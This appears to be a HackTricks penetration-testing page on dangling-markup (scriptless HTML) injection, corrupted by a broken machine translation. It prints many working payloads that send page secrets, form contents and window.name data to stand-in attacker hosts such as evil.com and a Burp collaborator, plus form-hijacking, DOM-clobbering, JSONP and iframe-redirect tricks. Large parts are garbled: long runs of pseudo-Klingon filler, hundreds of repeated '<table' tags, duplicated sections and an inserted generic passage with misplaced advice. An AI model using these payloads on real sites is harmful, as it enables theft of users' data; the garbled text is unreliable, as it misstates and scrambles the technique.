hacktricks/pentesting-web/dangling-markup-html-scriptless-injection

Dangling Markup - HTML scriptless injection

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

• If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
• Get the official PEASS & HackTricks swag
• Discover The PEASS Family, our collection of exclusive NFTs
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
• Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Resume

This technique can be use to extract information from a user when an HTML injection is found. This is very useful if you don't find any way to exploit a XSS but you can inject some HTML tags.
It is also useful if some secret is saved in clear text in the HTML and you want to exfiltrate it from the client, or if you want to mislead some script execution.

Several techniques commented here can be used to bypass some Content Security Policy by exfiltrating information in unexpected ways (html tags, CSS, http-meta tags, forms, base...).

Main Applications

Stealing clear text secrets

If you inject <img src='http://evil.com/log.cgi? when the page is loaded the victim will send you all the code between the injected img tag and the next quote inside the code. If a secret is somehow located in that chunk, you will steal i t(you can do the same thing using a double quote,take a look which could be more interesting to use).

If the img tag is forbidden (due to CSP for example) you can also use <meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?

<img src='http://attacker.com/log.php?HTML=
<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=
<meta http-equiv="refresh" content='0;URL=ftp://evil.com?a=

ghItlhvam Chrome HTTP URLs block "<" 'ej "\n" vaj vItlhutlh 'e' "ftp" protocol schemes 'e' tlhIngan vItlhutlh.

CSS @import 'e' ghItlhvam (vItlhutlh vaj ";" vItlhutlh vaj code bI'el) vItlhutlh vaj 'e' tlhIngan vItlhutlh.

<style>@import//hackvertor.co.uk?     <--- Injected
<b>steal me!</b>;

<table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table <table **

<table background='//your-collaborator-id.burpcollaborator.net?'

Translated Content:

### Translated Content:

You could also insert a `<base` tag. All the information will be sent until the quote is closed but it requires some user interaction (the user must click in some link, because the base tag will have changed the domain pointed by the link):

You could also insert a `<base` tag. All the information will be sent until the quote is closed but it requires some user interaction (the user must click in some link, because the base tag will have changed the domain pointed by the link):

<base target='        <--- Injected
steal me'<b>test</b>

qo'wI' 'oH

Introduction

In this section, we will discuss a technique called "Stealing forms" that can be used to extract sensitive information from web applications. This technique takes advantage of a vulnerability known as "Dangling Markup HTML Scriptless Injection."

What is Dangling Markup HTML Scriptless Injection?

Dangling Markup HTML Scriptless Injection is a type of vulnerability that occurs when a web application fails to properly sanitize user input. This allows an attacker to inject malicious code into the application, which can then be executed by unsuspecting users.

How does it work?

The process of stealing forms using Dangling Markup HTML Scriptless Injection involves the following steps:

1. Identify the vulnerable web application: The first step is to identify a web application that is vulnerable to Dangling Markup HTML Scriptless Injection. This can be done by conducting a thorough analysis of the application's code and input validation mechanisms.

2. Inject malicious code: Once a vulnerable application is identified, the attacker can inject malicious code into the application. This code is typically injected into user input fields, such as login forms or contact forms.

3. Exploit the vulnerability: When a user interacts with the injected code, it triggers the vulnerability and allows the attacker to steal sensitive information. This can include usernames, passwords, credit card numbers, or any other data entered into the form.

4. Collect the stolen information: Finally, the attacker collects the stolen information and can use it for malicious purposes, such as identity theft or financial fraud.

Mitigation

To protect against Dangling Markup HTML Scriptless Injection and prevent the stealing of forms, web application developers should follow these best practices:

• Implement proper input validation: All user input should be properly validated and sanitized to prevent the execution of malicious code.

• Use secure coding practices: Developers should follow secure coding practices, such as using parameterized queries and prepared statements, to prevent code injection attacks.

• Regularly update and patch software: Keeping web applications and frameworks up to date with the latest security patches can help prevent vulnerabilities.

• Educate users: Users should be educated about the risks of interacting with untrusted websites and should be cautious when entering sensitive information online.

By following these best practices, web application developers can significantly reduce the risk of Dangling Markup HTML Scriptless Injection and protect user data from being stolen.

<base href='http://evil.com/'>

Stealing forms 2

Set a form header: <form action='http://evil.com/log_steal'> this will overwrite the next form header and all the data from the form will be sent to the attacker.

Stealing forms 3

The button can change the URL where the information of the form is going to be sent with the attribute "formaction":

<button name=xss type=submit formaction='https://google.com'>I get consumed!

Stealing clear text secrets 2

An attacker can use this to steal the information.

Using the latest mentioned technique to steal forms (injecting a new form header) you can then inject a new input field:

qo' vItlhutlh

ghu'vam vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vItlhutlhDI' 'e' vIt

<input type='hidden' name='review_body' value="

`and this input field will contain all the content between its double quote and the next double quote in the HTML. This attack mix the "Stealing clear text secrets" with "Stealing forms2".

You can do the same thing injecting a form and an <option> tag. All the data until a closed </option> is found will be sent:`

'ej vaj vItlhutlh 'e' vItlhutlh HTML vItlhutlh. "_**Stealing clear text secrets**_" 'ej "_**Stealing forms2**_" vItlhutlh. vaj vItlhutlh tag 'ej vItlhutlh form injecting 'e' vItlhutlh. vItlhutlh vaj vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh:

<form action=http://google.com><input type="submit">Click Me</input><select name=xss><option

Form parameter injection

tlhIngan Hol translation:

Form parameter injection (Form parameter injection)

tlhIngan Hol translation:

Form parameter injection

You can change the path of a form and insert new values so an unexpected action will be performed:

<form action='/change_settings.php'>
<input type='hidden' name='invite_user'
value='fredmbogo'>                                        ← Injected lines

<form action="/change_settings.php">                        ← Existing form (ignored by the parser)
...
<input type="text" name="invite_user" value="">             ← Subverted field
...
<input type="hidden" name="xsrf_token" value="12345">
...
</form>

Stealing clear text secrets via noscript

<noscript></noscript> jatlh tag vItlhutlh browser javascript support (Chrome chrome://settings/content/javascript vItlhutlh) enable/disable.

web page content injection point bottom attacker controlled site exfiltrate way:

<noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>

CSP-ghItlhvam vItlhutlh

Portswiggers research vItlhutlh CSP ghaH chaw'wI' CSP exfiltrate data user interaction. vaj payload vItlhutlh:

<a href=http://attacker.net/payload.html><font size=100 color=red>You must click me</font></a>
<base target='

Qapla'! jImej ghaH link ghItlh vItlhutlh payload jatlh vItlhutlh. jatlh target attribute base tag HTML content vItlhutlh single quote vetlh.
HTML content vItlhutlh link ghItlh vItlhutlh window.name value vItlhutlh. So, link ghItlh victim vItlhutlh page jImej click vItlhutlh, window.name vItlhutlh ghItlh ghItlh data vItlhutlh.

<script>
if(window.name) {
new Image().src='//your-collaborator-id.burpcollaborator.net?'+encodeURIComponent(window.name);
</script>

Misleading script workflow 1 - HTML namespace attack

Insert a new tag with and id inside the HTML that will overwrite the next one and with a value that will affect the flow of a script. In this example you are selecting with whom a information is going to be shared:

qoH script workflow 1 - HTML namespace attack

Insert a new tag with and id inside the HTML that will overwrite the next one and with a value that will affect the flow of a script. In this example you are selecting with whom a information is going to be shared:

<input type='hidden' id='share_with' value='fredmbogo'>     ← Injected markup
...
Share this status update with:                              ← Legitimate optional element of a dialog
<input id='share_with' value=''>

...

function submit_status_update() {
...
request.share_with = document.getElementById('share_with').value;
...
}

qoH script workflow 2 - Script namespace attack

Create variables inside javascript namespace by inserting HTML tags. Then, this variable will affect the flow of the application:

qoH script workflow 2 - Script namespace attack

Create variables inside javascript namespace by inserting HTML tags. Then, this variable will affect the flow of the application:

<img id='is_public'>                                        ← Injected markup

...

// Legitimate application code follows

function retrieve_acls() {
...
if (response.access_mode == AM_PUBLIC)                    ← The subsequent assignment fails in IE
is_public = true;
else
is_public = false;
}

function submit_new_acls() {
...
if (is_public) request.access_mode = AM_PUBLIC;           ← Condition always evaluates to true
...
}

JSONP-ghItlh

vaj JSONP interface vItlhutlh, vaj 'arbitrary' vItlhutlh function vItlhutlh 'arbitrary' data vItlhutlh vItlhutlh:

<script src='/editor/sharing.js'>:              ← Legitimate script
function set_sharing(public) {
if (public) request.access_mode = AM_PUBLIC;
else request.access_mode = AM_PRIVATE;
...
}

<script src='/search?q=a&call=set_sharing'>:    ← Injected JSONP call
set_sharing({ ... })

Or jImej javascript vItlhutlh.

<script src='/search?q=a&call=alert(1)'></script>

Iframe abuse

Iframe abuse

A child document possesses the capability to view and modify the location property of its parent, even in cross-origin situations. This allows the embedding of a script within an iframe that can redirect the client to an arbitrary page:

<html><head></head><body><script>top.window.location = "https://attacker.com/hacked.html"</script></body></html>

Dangling Markup HTML Scriptless Injection

Summary

Dangling Markup HTML Scriptless Injection is a technique that allows an attacker to inject HTML code into a vulnerable web application, without the need for JavaScript or script tags. This can be used to exploit various vulnerabilities, such as leaking sensitive information from a different page using the iframe name attribute.

Mitigation

To mitigate this vulnerability, you can use the sandbox attribute with the value sandbox=' allow-scripts allow-top-navigation'. This restricts the capabilities of the injected HTML code and prevents it from executing scripts or navigating to other pages.

Leaking Sensitive Information using the iframe name attribute

Another way to exploit this vulnerability is by abusing the iframe name attribute to leak sensitive information from a different page. By injecting HTML code that makes the sensitive information appear inside the iframe name attribute, the attacker can then access that name from the initial iframe and leak the information.

<script>
function cspBypass(win) {
win[0].location = 'about:blank';
setTimeout(()=>alert(win[0].name), 500);
}
</script>

<iframe src="//subdomain1.portswigger-labs.net/bypassing-csp-with-dangling-iframes/target.php?email=%22><iframe name=%27" onload="cspBypass(this.contentWindow)"></iframe>

For more info check https://portswigger.net/research/bypassing-csp-with-dangling-iframes

<meta abuse

You could use meta http-equiv to perform several actions like setting a Cookie: <meta http-equiv="Set-Cookie" Content="SESSID=1"> or performing a redirect (in 5s in this case): <meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />

This can be avoided with a CSP regarding http-equiv ( Content-Security-Policy: default-src 'self';, or Content-Security-Policy: http-equiv 'self';)

New <portal HTML tag

You can find a very interesting research on exploitable vulnerabilities of the <portal tag here.
At the moment of this writing you need to enable the portal tag on Chrome in chrome://flags/#enable-portals or it won't work.

<portal src='https://attacker-server?

HTML Leaks

HTML Leaks

Not all the ways to leak connectivity in HTML will be useful for Dangling Markup, but sometimes it could help. Check them here: https://github.com/cure53/HTTPLeaks/blob/master/leak.html

SS-Leaks

SS-Leaks

This is a mix between dangling markup and XS-Leaks. From one side the vulnerability allows to inject HTML (but not JS) in a page of the same origin of the one we will be attacking. On the other side we won't attack directly the page where we can inject HTML, but another page.

{% content-ref url="ss-leaks.md" %} ss-leaks.md {% endcontent-ref %}

XS-Search/XS-Leaks

XS-Search/XS-Leaks

XS-Search are oriented to exfiltrate cross-origin information abusing side channel attacks.Therefore, it's a different technique than Dangling Markup, however, some of the techniques abuse the inclusion of HTML tags (with and without JS execution), like CSS Injection or Lazy Load Images.

{% content-ref url="../xs-search.md" %} xs-search.md {% endcontent-ref %}

Brute-Force Detection List

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt" %}

References

• https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057
• http://lcamtuf.coredump.cx/postxss/
• http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/
• https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

• If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
• Get the official PEASS & HackTricks swag
• Discover The PEASS Family, our collection of exclusive NFTs
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
• Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.